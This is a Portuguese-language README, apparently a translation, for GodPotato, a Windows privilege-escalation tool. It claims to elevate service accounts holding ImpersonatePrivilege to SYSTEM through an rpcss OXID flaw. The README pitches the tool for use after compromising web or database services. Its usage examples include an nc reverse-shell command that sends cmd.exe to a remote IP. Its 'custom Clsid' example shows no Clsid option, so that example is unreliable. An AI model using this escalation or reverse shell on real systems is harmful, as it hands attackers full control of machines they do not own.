
Ferramenta de escalonamento de privilégios baseada em DCOM para Windows Server 2012-2022 e Windows 8-11, elevando usuários com ImpersonatePrivilege para NT AUTHORITY\SYSTEM via vulnerabilidade rpcss oxid.
Baseando-se no histórico de escalada de privilégios Potato por 6 anos, desde o início do RottenPotato até o fim do JuicyPotatoNG, descobri uma nova tecnologia pesquisando o DCOM, que possibilita a escalada de privilégios no Windows 2012 - Windows 2022, agora, desde que você tenha permissão "ImpersonatePrivilege". Então você é "NT AUTHORITY\SYSTEM". Geralmente, serviços WEB e de banco de dados possuem permissões "ImpersonatePrivilege".
A escalada de privilégios Potato é geralmente usada quando obtemos privilégios WEB/banco de dados. Podemos elevar um usuário de serviço com privilégios baixos para "NT AUTHORITY\SYSTEM". No entanto, o Potato histórico não tem como rodar nos sistemas Windows mais recentes. Quando eu estava pesquisando DCOM, encontrei um novo método que pode realizar escalada de privilégios. Existem algumas falhas no rpcss ao lidar com oxid, e o rpcss é um serviço que deve estar aberto pelo sistema. Portanto, pode rodar em praticamente qualquer sistema operacional Windows, eu o nomeei GodPotato.
Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11
FFFFF FFF FFFFFFF
FFFFFFF FFF FFFFFFFF
FFF FFFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFFF FFFFFFF FFFFFFFF FFF FFF FFFFFFF FFFFFFFFF FFFFFF FFFFFFFFF FFFFFF
FFFF FFFF FFFF FFF FFFF FFF FFFF FFFF FFFF FFF FFF FFF FFF FFF FFFF
FFFF FFFFF FFF FFF FFF FFF FFFFFFFF FFF FFF FFF F FFF FFF FFF FFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFF FFF FFF FFFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFFFFF FFF FFF FFFF
FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFF FFF FFF FFFF
FFFF FFFF FFFF FFF FFFF FFF FFF FFF FFFF FFF FFFF FFF FFF FFFF FFF
FFFFFFFF FFFFFFF FFFFFFFF FFF FFFFFFF FFFFFF FFFFFFFF FFFFFFF FFFFFFF
FFFFFFF FFFFF FFFFFFF FFF FFFFF FFFFF FFFFFFFF FFFF FFFF
Argumentos:
-cmd Obrigatório:True Linha de Comando (default cmd /c whoami)
Exemplo:
GodPotato -cmd "cmd /c whoami"
Use o Clsid embutido do programa para escalada de privilégios e execute um comando simples
GodPotato -cmd "cmd /c whoami"

Customize o Clsid e execute comandos
GodPotato -cmd "cmd /c whoami"

Execute comandos de shell reverso
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
zcgonvh
skay